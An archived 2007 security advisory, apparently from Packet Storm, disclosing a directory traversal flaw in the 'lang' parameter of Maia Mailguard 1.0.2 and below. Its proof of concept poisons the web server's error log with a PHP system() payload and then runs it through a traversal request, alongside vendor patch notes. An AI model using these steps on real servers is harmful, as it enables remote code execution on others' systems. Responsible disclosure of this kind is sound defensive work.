what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2007-06-28

Netragard Security Advisory 2007-06-28
Posted Jul 7, 2007
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Maia Mailguard versions 1.0.2 and below suffers from file read and directory traversal vulnerabilities that allow for remote code execution. Details provided.

tags | exploit, remote, vulnerability, code execution
SHA-256 | d36bb22c015e1a08a2926bcf374d2972835a70bfa94c4a09681029459a05bf6f

Netragard Security Advisory 2007-06-28

Change Mirror Download

*************************** NETRAGARD ADVISORY ************************
http://www.netragard.com
"We make IT Safe"
[Advisory Summary]
-----------------------------------------------------------------------
Advisory Author : Adriel T. Desautels
Advisory ID : NETRAGARD-20070628
Product Name : Maia Mailguard
Product Version : <= 1.0.2 (All Platforms)
Vendor Name : http://www.miamailguard.com
Type of Vulnerability : Directory Traversal / File Read
Effort (1-10 where 1 == easy) : 2
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 06/10/2007

[POSTING NOTICE]
-----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.

[Product Description]
-----------------------------------------------------------------------
"Maia Mailguard is a web-based interface and management system based on
the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
and PHP, Maia Mailguard gives end-users control over how their mail is
processed by virus scanners and spam filters, while giving mail
administrators the power to configure site-wide defaults and limits."

-- http://www.miamailguard.com --

[Technical Summary]
-----------------------------------------------------------------------
A Directory Traversal vulnerability exists in the Maia Mailguard Web
Application that enables an attacker to execute arbitrary commands on
the affected system.

[Technical Details]
-----------------------------------------------------------------------
Improper input validation on the "lang" variable in Maia Mailguard web
application has resulted in a Directory Traversal vulnerability that
can be used to execute arbitrary commands on he affected system, or, to
read arbitrary files on the affected system.

[Proof Of Concept]
-----------------------------------------------------------------------
1-) An attacker can inject code into the httpd-error.log file by
connecting to port 80 on the affected system and issuing a "get
<CODE HERE>" command. See example below:

the-wretched:~ simon$ telnet maiatest.snosoft.com 80
Trying 10.0.0.128...
Connected to maiatest.snosoft.com.
Escape character is '^]'.

get &ltpre>><?php system('ls -laf /var/log');?>

HTTP/1.1 400 Bad Request
Date: Wed, 20 Jun 2007 21:31:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1

2-) Once the attacker has injected his code into the log file, the code
can be executed by forcing the web application to read the log file.
When the log file is read, the code is executed. Below is an example
of code execution:

the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang=
../../../../../../../../../../../../../var/log/httpd-error.log%00.txt

[Vendor Status]
-----------------------------------------------------------------------
Vendor has been notified and has been very quick to respond to and
patch this issue.

[Vendor Comments]
-----------------------------------------------------------------------
"The only addition that I had was that it seems to only affect systems
like freebsd... It would be nice to nail that down. It suspect the
root security issue is really with the php and filesystem
interaction... my patch just simply works around and blocks the root
problem. From my developer point of view, I'm asking for one file
and the filesystem is giving us something else. That's a serious
risk. If we could at least express that concern, I think that would
be prudent.

Chicken and egg problem, I was kinda waiting on you to post our own
ticket, but.... I can add a comment afterwards. OK.
Here's our ticket which also references the changeset:

http://www.maiamailguard.org/maia/ticket/479

A unified patch may be retrieved from: http://www.maiamailguard.org/
maia/changeset/1184?format=diff&new=1184

David Morton"



[Disclaimer]
----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>







Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close